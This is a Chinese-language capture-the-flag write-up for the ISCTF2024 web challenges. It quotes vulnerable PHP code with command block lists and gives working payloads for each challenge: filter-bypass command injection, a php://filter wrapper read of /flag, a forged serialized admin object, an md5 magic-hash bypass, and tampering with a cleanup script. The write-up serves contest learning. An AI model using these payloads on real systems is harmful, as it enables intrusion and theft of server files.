isctf2024web

ISCTF2024：

1z_php:

if(isset($_POST['J'])){  $call=$_POST['J'];  $dangerous_commands = ['cat', 'tac', 'head', 'nl', 'more', 'less', 'tail', 'vi', 'sed', 'od'];  foreach ($dangerous_commands as $command) {    if (preg_match("/$command/i", $call)) {      die("这些个危险函数可不兴使啊");    }  }  system($call);}?>

J=ls / J=uniq /f14g

25时晓山瑞希生日会:

你不是烤p！要是Project Sekai的客户端请求才能加入生日会

在UA头上面改得到：你似乎没在正确的时间来…，额，时间:伪造data:Date: Thu, 27 Aug 2024 05:00:00 GMT

ezrce:

if (isset($_GET['cmd'])) {   $cmd = $_GET['cmd'];   if (preg_match("/flag|cat|ls|echo|php|bash|sh|more| |less|head|tail|[\|\&\>\<]|eval|system|exec|popen|shell_exec/i", $cmd)) {     die("Blocked by security filter!");   } else {     eval($cmd);   } } else {   highlight_file(__FILE__);

cmd=var_dump(scandir(‘/‘));进行读取根目录下面的文件发现flag，

法1：

cmd=include$_GET[1];&1=pHp://FilTer/convert.base64-encode/resource=/flag 然后解码

法2：

?cmd=var_dump(file_get_contents($_GET[‘1’]));&1=/flag

法3:

取反绕过

法4:

cmd=passthru(‘cd%09..;cd%09..;uniq%09/?l*’);

ezserialize:

<?php error_reporting(0); class Flag {   private $flag;   public function __construct() {     $this->flag = file_get_contents('/flag');   }   public function getFlag() {     return $this->flag;   }   public function __toString() {     return "You can't directly access the flag!";   } } class User {   public $username;   public $isAdmin = false;   public function __construct($username) {     $this->username = $username;   }   public function __wakeup() {     if ($this->isAdmin) {       echo "Welcome, admin! Here's your flag: " . (new Flag())->getFlag();     } else {       echo "Hello, " . htmlspecialchars($this->username) . "!";     }   } } if (isset($_GET['data'])) {   $data = $_GET['data'];   $object = unserialize($data);   if ($object instanceof User) {     echo $object;   } else {     echo "Invalid object!";   } } else {   highlight_file(__FILE__); } ?>

这个将false改为true然后随便传username就行了；

<?php
class Flag {
    private $flag;
}

class User {
    public $username;
    public $isAdmin = true;
}
$user = new User();
$user->username ="1";
echo serialize($user);

小蓝鲨的临时存储室：

这个直接传上去发现/flag文件打不开权限不够

发现/down_file.sh:find /var/www/localhost/htdocs/uploads/ -type f -name “*.php” -exec rm -f {} ;

可以改为：/flag > /tmp/1.txt 然后等会就ok了

小蓝鲨的冒险：

$a = "isctf2024"; $b = $_GET["b"]; @parse_str($b); if ($a[0] != 'QNKCDZO' && md5($a[0]) == md5('QNKCDZO')) {   $num = $_POST["num"];   if($num == 2024){     die("QAQ");   }   if(preg_match("/[a-z]/i", $num)){     die("no no no!");   }   if(intval($num,0) == 2024){     if (isset($_GET['which'])){       $which = $_GET['which'];       switch ($which){         case 0:           print('QAQ');         case 1:         case 2:           require_once $which.'.php';           echo $flag;           break;         default:           echo GWF_HTML::error('PHP-0817', 'Hacker NoNoNo!', false);           break;

首先是md5绕过：b=a[0]=240610708

然后:小数绕过：num=2024.1或者8进制

然后：

if (isset($_GET[‘which’])){ $which = $_GET[‘which’]; switch ($which){ case 0: print(‘QAQ’); case 1: case 2: require_once $which.’.php’; echo $flag; break; default: echo GWF_HTML::error(‘PHP-0817’, ‘Hacker NoNoNo!’, false); break;

传which=flag 正好匹配flag.php就出来了